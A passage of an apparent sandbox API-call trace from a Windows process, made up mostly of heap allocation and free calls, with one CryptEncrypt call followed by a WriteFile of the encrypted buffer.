Size=0x40) returned 0x2e78810 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0249.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9006) returned 0x2f38050 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f38050 | out: hHeap=0x970000) returned 1 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0249.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.532] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0249.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0249.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0249.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0249.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0249.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51bb0 [0249.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0249.536] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54558 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0249.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0249.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0249.537] CryptEncrypt (in: hKey=0xa87690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2f040*, pdwDataLen=0x8cef60*=0x9006, dwBufLen=0x9008 | out: pbData=0x2f2f040*, pdwDataLen=0x8cef60*=0x9008) returned 1 [0249.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0249.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0249.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0249.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0249.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0249.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0249.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0249.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0249.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0249.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0249.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0249.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0249.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.543] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0249.543] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0249.543] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.582] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.582] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0249.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.583] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.593] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f1d020*, nNumberOfBytesToWrite=0x9008, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f1d020*, lpNumberOfBytesWritten=0x8cf5e4*=0x9008, lpOverlapped=0x0) returned 1 [0249.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.598] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0249.598] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) 